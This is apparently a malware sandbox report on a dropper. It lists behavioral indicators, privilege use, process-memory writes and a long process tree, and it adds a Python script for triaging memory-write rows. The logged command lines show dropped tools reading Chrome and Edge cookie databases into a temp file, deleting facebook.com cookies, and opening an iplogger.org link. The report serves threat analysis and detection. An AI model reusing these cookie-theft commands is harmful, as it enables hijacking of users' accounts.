Processes:
description | flow | ioc
HTTP User-Agent header | 147 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header | 150 | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
WerFault.exe, msedge.exe, msedge.exe, WerFault.exe, identity_helper.exe, Installation.exe, 9avfIn5IigP_u4pj8JpAtsYA.exe, WerFault.exe, WerFault.exe, ZNjEI97V8_TzeA2vWbShf6jj.exe, 22222.exe, WerFault.exe, WerFault.exe, WerFault.exe
pid | process
344 | WerFault.exe (×2)
3644 | msedge.exe (×2)
4696 | msedge.exe (×2)
4700 | WerFault.exe (×2)
1500 | identity_helper.exe (×2)
4584 | Installation.exe (×26)
5916 | 9avfIn5IigP_u4pj8JpAtsYA.exe (×4)
2512 | WerFault.exe (×2)
5488 | WerFault.exe (×2)
5428 | ZNjEI97V8_TzeA2vWbShf6jj.exe (×2)
1444 | 22222.exe (×2)
5604 | WerFault.exe (×2)
4832 | WerFault.exe (×2)
2312 | WerFault.exe (×2)
3208 | (no process name recorded) (×10)
-
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
ZNjEI97V8_TzeA2vWbShf6jj.exe
pid | process
5428 | ZNjEI97V8_TzeA2vWbShf6jj.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
KRSetp.exe, WerFault.exe, svchost.exe, ABhgA1_JcNSjunWCJULBHWy2.exe, sDD53xiAFXf45j9jMPz5AqNg.exe, s9CZCVkwZnCKvuAXID9kjcGG.exe, _MiKooJ7I6X_jN040tJwAo75.exe, 4VhdBSLn5e31ry9R4lNsreSR.exe, 5VBfkYZvUYTuOQ4AHP9J6iE9.exe, 7036493.exe, vssvc.exe, 3529569.exe, powershell.exe, askinstall53.exe
description | pid | process
Token: SeDebugPrivilege | 5076 | KRSetp.exe
Token: SeRestorePrivilege | 344 | WerFault.exe
Token: SeBackupPrivilege | 344 | WerFault.exe
Token: SeBackupPrivilege | 344 | WerFault.exe
Token: SeTcbPrivilege | 5112 | svchost.exe (×6)
Token: SeDebugPrivilege | 5336 | ABhgA1_JcNSjunWCJULBHWy2.exe
Token: SeDebugPrivilege | 5616 | sDD53xiAFXf45j9jMPz5AqNg.exe
Token: SeDebugPrivilege | 5624 | s9CZCVkwZnCKvuAXID9kjcGG.exe
Token: SeShutdownPrivilege | 3208 | (no process name recorded)
Token: SeCreatePagefilePrivilege | 3208 | (no process name recorded)
Token: SeShutdownPrivilege | 3208 | (no process name recorded)
Token: SeCreatePagefilePrivilege | 3208 | (no process name recorded)
Token: SeShutdownPrivilege | 3208 | (no process name recorded)
Token: SeCreatePagefilePrivilege | 3208 | (no process name recorded)
Token: SeDebugPrivilege | 5436 | _MiKooJ7I6X_jN040tJwAo75.exe
Token: SeDebugPrivilege | 5420 | 4VhdBSLn5e31ry9R4lNsreSR.exe
Token: SeShutdownPrivilege | 3208 | (no process name recorded)
Token: SeCreatePagefilePrivilege | 3208 | (no process name recorded)
Token: SeShutdownPrivilege | 3208 | (no process name recorded)
Token: SeCreatePagefilePrivilege | 3208 | (no process name recorded)
Token: SeShutdownPrivilege | 3208 | (no process name recorded)
Token: SeCreatePagefilePrivilege | 3208 | (no process name recorded)
Token: SeDebugPrivilege | 3876 | 5VBfkYZvUYTuOQ4AHP9J6iE9.exe
Token: SeDebugPrivilege | 4964 | 7036493.exe
Token: SeShutdownPrivilege | 3208 | (no process name recorded)
Token: SeCreatePagefilePrivilege | 3208 | (no process name recorded)
Token: SeShutdownPrivilege | 3208 | (no process name recorded)
Token: SeCreatePagefilePrivilege | 3208 | (no process name recorded)
Token: SeBackupPrivilege | 3060 | vssvc.exe
Token: SeRestorePrivilege | 3060 | vssvc.exe
Token: SeAuditPrivilege | 3060 | vssvc.exe
Token: SeDebugPrivilege | 4288 | 3529569.exe
Token: SeDebugPrivilege | 4396 | powershell.exe
Token: SeRestorePrivilege | 3060 | vssvc.exe
Token: SeShutdownPrivilege | 3208 | (no process name recorded)
Token: SeCreatePagefilePrivilege | 3208 | (no process name recorded)
Token: SeShutdownPrivilege | 3208 | (no process name recorded)
Token: SeCreatePagefilePrivilege | 3208 | (no process name recorded)
Token: SeShutdownPrivilege | 3208 | (no process name recorded)
Token: SeCreatePagefilePrivilege | 3208 | (no process name recorded)
Token: SeShutdownPrivilege | 3208 | (no process name recorded)
Token: SeCreatePagefilePrivilege | 3208 | (no process name recorded)
Token: SeShutdownPrivilege | 3208 | (no process name recorded)
Token: SeCreatePagefilePrivilege | 3208 | (no process name recorded)
Token: SeShutdownPrivilege | 3208 | (no process name recorded)
Token: SeCreatePagefilePrivilege | 3208 | (no process name recorded)
Token: SeCreateTokenPrivilege | 5380 | askinstall53.exe
Token: SeAssignPrimaryTokenPrivilege | 5380 | askinstall53.exe
Token: SeLockMemoryPrivilege | 5380 | askinstall53.exe
Token: SeIncreaseQuotaPrivilege | 5380 | askinstall53.exe
Token: SeMachineAccountPrivilege | 5380 | askinstall53.exe
Token: SeTcbPrivilege | 5380 | askinstall53.exe
Token: SeSecurityPrivilege | 5380 | askinstall53.exe
Token: SeTakeOwnershipPrivilege | 5380 | askinstall53.exe
Token: SeLoadDriverPrivilege | 5380 | askinstall53.exe
Token: SeSystemProfilePrivilege | 5380 | askinstall53.exe
Token: SeSystemtimePrivilege | 5380 | askinstall53.exe
Token: SeProfSingleProcessPrivilege | 5380 | askinstall53.exe
Token: SeIncBasePriorityPrivilege | 5380 | askinstall53.exe
-
Suspicious use of FindShellTrayWindow 3 IoCs
Processes:
msedge.exe, n06BeJZiAJ9ZGyBXLy2bju0A.tmp, Cleaner Installation.exe
pid | process
4696 | msedge.exe
5556 | n06BeJZiAJ9ZGyBXLy2bju0A.tmp
2308 | Cleaner Installation.exe
-
Suspicious use of SetWindowsHookEx 36 IoCs
Processes:
Installation.exe, uAa_AbxThvGNSkQqNALUo28a.exe, mRMKJujcnUvhd7DjNMDCb8eN.exe, FkdTCM26AHjprP7cVvGtWYus.exe, 1xwHsYY6JY2X9HJMmqNaZyN_.exe, 9avfIn5IigP_u4pj8JpAtsYA.exe, VBzqFkfsDOMfFiW5eX98wd2t.exe, customer3.exe, kUZysLnJ5VU1GTZZD0uqlySQ.exe, LSBnF4NXGH5rmUEXTqMKoFvs.exe, md8_8eus.exe, jfiag3g_gg.exe, kUZysLnJ5VU1GTZZD0uqlySQ.exe, n06BeJZiAJ9ZGyBXLy2bju0A.exe, 11111.exe, n06BeJZiAJ9ZGyBXLy2bju0A.tmp, VC_redist.x64.exe, VC_redist.x64.exe, 11111.exe, VC_redist.x64.exe, 11111.exe, 11111.exe, jfiag3g_gg.exe, 11111.exe, 11111.exe, 11111.exe, askinstall53.exe, 22222.exe, Setup.exe, MediaBurner2.exe, MediaBurner2.tmp, 22222.exe, zhangfei.exe, 22222.exe, zhangfei.exe
pid | process
4584 | Installation.exe
5164 | uAa_AbxThvGNSkQqNALUo28a.exe
5216 | mRMKJujcnUvhd7DjNMDCb8eN.exe
5388 | FkdTCM26AHjprP7cVvGtWYus.exe
5428 | 1xwHsYY6JY2X9HJMmqNaZyN_.exe
5916 | 9avfIn5IigP_u4pj8JpAtsYA.exe
5344 | VBzqFkfsDOMfFiW5eX98wd2t.exe
6100 | customer3.exe
5608 | kUZysLnJ5VU1GTZZD0uqlySQ.exe
5860 | LSBnF4NXGH5rmUEXTqMKoFvs.exe
1388 | md8_8eus.exe
4872 | jfiag3g_gg.exe
1432 | kUZysLnJ5VU1GTZZD0uqlySQ.exe
6052 | n06BeJZiAJ9ZGyBXLy2bju0A.exe
6084 | 11111.exe
5556 | n06BeJZiAJ9ZGyBXLy2bju0A.tmp
4104 | VC_redist.x64.exe
5648 | VC_redist.x64.exe
444 | 11111.exe
6020 | VC_redist.x64.exe
2876 | 11111.exe
5252 | 11111.exe
1120 | jfiag3g_gg.exe
3292 | 11111.exe
4164 | 11111.exe
5484 | 11111.exe
5380 | askinstall53.exe
1444 | 22222.exe
3800 | Setup.exe
1344 | MediaBurner2.exe
5380 | askinstall53.exe
5492 | MediaBurner2.tmp
2568 | 22222.exe
2080 | zhangfei.exe
6352 | 22222.exe
6904 | zhangfei.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
EB7233922891E1DAD0434FBD52623647.exe, msedge.exe, Folder.exe, rUNdlL32.eXe, WerFault.exe
description | pid | process | target process
PID 5008 wrote to memory of 5076 | 5008 | EB7233922891E1DAD0434FBD52623647.exe | KRSetp.exe (×2)
PID 5008 wrote to memory of 4696 | 5008 | EB7233922891E1DAD0434FBD52623647.exe | msedge.exe (×2)
PID 5008 wrote to memory of 4684 | 5008 | EB7233922891E1DAD0434FBD52623647.exe | Folder.exe (×3)
PID 4696 wrote to memory of 4740 | 4696 | msedge.exe | msedge.exe (×2)
PID 4684 wrote to memory of 5024 | 4684 | Folder.exe | Folder.exe (×3)
PID 5008 wrote to memory of 4568 | 5008 | EB7233922891E1DAD0434FBD52623647.exe | Info.exe (×3)
PID 2892 wrote to memory of 4828 | 2892 | rUNdlL32.eXe | rundll32.exe (×3)
PID 4100 wrote to memory of 4828 | 4100 | WerFault.exe | rundll32.exe (×2)
PID 4696 wrote to memory of 4900 | 4696 | msedge.exe | msedge.exe (×40)
PID 4696 wrote to memory of 3644 | 4696 | msedge.exe | msedge.exe (×2)
PID 4696 wrote to memory of 4752 | 4696 | msedge.exe | msedge.exe (×2)
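The 64 WriteProcessMemory rows above are dominated by one edge repeated (msedge.exe 4696 into its child 4900), and the flat list hides the entries that matter more: the dropper 5008 writing into KRSetp.exe, Folder.exe, Info.exe and msedge.exe, and the mixed-case rUNdlL32.eXe (2892) writing into rundll32.exe (4828). The script below is an added example, not the sandbox's own code: it parses rows in the report's `description pid process target process` layout into writer/target edges with counts, lists the distinct targets of a PID, and flags cross-image writes and non-canonical spellings of system binaries. The sample rows are constructed from the shapes in the report; the system-binary list and the case heuristic are assumptions made for this example.

```python
import re
from collections import Counter, OrderedDict

# Constructed sample rows in the report's "description pid process target process"
# layout (typed in as test input, modelled on the report's rows, not copied from it).
SAMPLE_WPM = """
PID 5008 wrote to memory of 5076 5008 EB7233922891E1DAD0434FBD52623647.exe KRSetp.exe
PID 5008 wrote to memory of 5076 5008 EB7233922891E1DAD0434FBD52623647.exe KRSetp.exe
PID 5008 wrote to memory of 4696 5008 EB7233922891E1DAD0434FBD52623647.exe msedge.exe
PID 4696 wrote to memory of 4900 4696 msedge.exe msedge.exe
PID 4696 wrote to memory of 4900 4696 msedge.exe msedge.exe
PID 4696 wrote to memory of 4900 4696 msedge.exe msedge.exe
PID 2892 wrote to memory of 4828 2892 rUNdlL32.eXe rundll32.exe
PID 4100 wrote to memory of 4828 4100 WerFault.exe rundll32.exe
"""

# "PID <src> wrote to memory of <dst> <src> <src image> <dst image>". Image names
# are taken as whitespace-free here; a name with a space (the report lists one,
# "Cleaner Installation.exe") would need a column-aware parser instead.
WPM_RE = re.compile(
    r"^PID (?P<src>\d+) wrote to memory of (?P<dst>\d+) (?P=src) "
    r"(?P<src_image>\S+) (?P<dst_image>\S+)$"
)

# Windows binaries whose on-disk names are lowercase; a mixed-case spelling in the
# report means the launcher typed the name itself (heuristic assumed for this example).
LOWERCASE_SYSTEM_BINARIES = {
    "rundll32.exe", "regsvr32.exe", "mshta.exe", "powershell.exe",
    "cmd.exe", "schtasks.exe", "bitsadmin.exe", "wscript.exe", "cscript.exe",
}


def parse_edges(text):
    """Return (src_pid, src_image, dst_pid, dst_image) per WriteProcessMemory row."""
    edges = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = WPM_RE.match(line)
        if m is None:
            raise ValueError(f"unrecognised row: {line!r}")
        edges.append((int(m["src"]), m["src_image"], int(m["dst"]), m["dst_image"]))
    return edges


def edge_counts(text):
    """Collapse repeated rows into one edge per (writer, target) pair with a count."""
    return Counter(parse_edges(text))


def targets_of(text, pid):
    """Distinct (pid, image) targets a given writer PID wrote into, in report order."""
    seen = OrderedDict()
    for src, _, dst, dst_image in parse_edges(text):
        if src == pid:
            seen[(dst, dst_image)] = None
    return list(seen)


def cross_image_writes(text):
    """Distinct (writer image, target image) pairs where the two binaries differ.

    Compared case-insensitively, so rUNdlL32.eXe -> rundll32.exe counts as
    same-image. A Chromium-style browser writing into its own child processes is
    normal broker behaviour; a dropper writing into binaries it just spawned is
    the pattern worth following up.
    """
    seen = OrderedDict()
    for _, src_image, _, dst_image in parse_edges(text):
        if src_image.lower() != dst_image.lower():
            seen[(src_image, dst_image)] = None
    return list(seen)


def odd_case_names(text):
    """Process names that are known system binaries spelled in non-canonical case."""
    names = OrderedDict()
    for _, src_image, _, dst_image in parse_edges(text):
        for name in (src_image, dst_image):
            if name.lower() in LOWERCASE_SYSTEM_BINARIES and name != name.lower():
                names[name] = None
    return list(names)


if __name__ == "__main__":
    for (src, src_image, dst, dst_image), n in edge_counts(SAMPLE_WPM).items():
        print(f"{src:>5} {src_image:40} -> {dst:>5} {dst_image:20} x{n}")
    print("cross-image writes:", cross_image_writes(SAMPLE_WPM))
    print("odd-case names:", odd_case_names(SAMPLE_WPM))
```

The collapsed edge list is what a process-tree view of the same data shows; `cross_image_writes` and `odd_case_names` are the two filters that pull the dropper's writes and the case-mangled rundll32 launch out of the browser noise.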
Processes
- C:\Users\Admin\AppData\Local\Temp\EB7233922891E1DAD0434FBD52623647.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\EB7233922891E1DAD0434FBD52623647.exe"
  - Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Local\Temp\RarSFX0\KRSetp.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\RarSFX0\KRSetp.exe"
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/19Pfw7
    - Adds Run key to start application
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0x100,0x110,0x7fffd8a646f8,0x7fffd8a64708,0x7fffd8a64718
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,13618417175797023837,1487324231035283961,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,13618417175797023837,1487324231035283961,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:3
      - Suspicious behavior: EnumeratesProcesses
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,13618417175797023837,1487324231035283961,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2696 /prefetch:8
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,13618417175797023837,1487324231035283961,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,13618417175797023837,1487324231035283961,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
    - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,13618417175797023837,1487324231035283961,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5152 /prefetch:8
    - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,13618417175797023837,1487324231035283961,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5152 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,13618417175797023837,1487324231035283961,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5272 /prefetch:1
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,13618417175797023837,1487324231035283961,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:1
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,13618417175797023837,1487324231035283961,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4608 /prefetch:2
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,13618417175797023837,1487324231035283961,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1232 /prefetch:13⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,13618417175797023837,1487324231035283961,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5632 /prefetch:13⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Folder.exe" -a3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Info.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Info.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 2403⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Installation.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Installation.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\uAa_AbxThvGNSkQqNALUo28a.exe"C:\Users\Admin\Documents\uAa_AbxThvGNSkQqNALUo28a.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\HA0R0oOrvoeWkYK_NWGeEuqA.exe"C:\Users\Admin\Documents\HA0R0oOrvoeWkYK_NWGeEuqA.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5200 -s 2404⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\9DiGSOxNcKhW80kKxcL6J5ZA.exe"C:\Users\Admin\Documents\9DiGSOxNcKhW80kKxcL6J5ZA.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\9DiGSOxNcKhW80kKxcL6J5ZA.exe"C:\Users\Admin\Documents\9DiGSOxNcKhW80kKxcL6J5ZA.exe"4⤵
-
C:\Users\Admin\Documents\9DiGSOxNcKhW80kKxcL6J5ZA.exe"C:\Users\Admin\Documents\9DiGSOxNcKhW80kKxcL6J5ZA.exe"4⤵
-
C:\Users\Admin\Documents\9DiGSOxNcKhW80kKxcL6J5ZA.exe"C:\Users\Admin\Documents\9DiGSOxNcKhW80kKxcL6J5ZA.exe"4⤵
-
C:\Users\Admin\Documents\ZNjEI97V8_TzeA2vWbShf6jj.exe"C:\Users\Admin\Documents\ZNjEI97V8_TzeA2vWbShf6jj.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\ZNjEI97V8_TzeA2vWbShf6jj.exe"C:\Users\Admin\Documents\ZNjEI97V8_TzeA2vWbShf6jj.exe"4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Documents\mRMKJujcnUvhd7DjNMDCb8eN.exe"C:\Users\Admin\Documents\mRMKJujcnUvhd7DjNMDCb8eN.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"4⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"5⤵
- Executes dropped EXE
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"5⤵
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\0OT08f9pu9hybIxDMQ79H_UI.exe"C:\Users\Admin\Documents\0OT08f9pu9hybIxDMQ79H_UI.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5360 -s 2444⤵
- Program crash
-
C:\Users\Admin\Documents\2SXoBBHk0EQOBLgphYL2mbeI.exe"C:\Users\Admin\Documents\2SXoBBHk0EQOBLgphYL2mbeI.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\2SXoBBHk0EQOBLgphYL2mbeI.exeC:\Users\Admin\Documents\2SXoBBHk0EQOBLgphYL2mbeI.exe4⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\VBzqFkfsDOMfFiW5eX98wd2t.exe"C:\Users\Admin\Documents\VBzqFkfsDOMfFiW5eX98wd2t.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
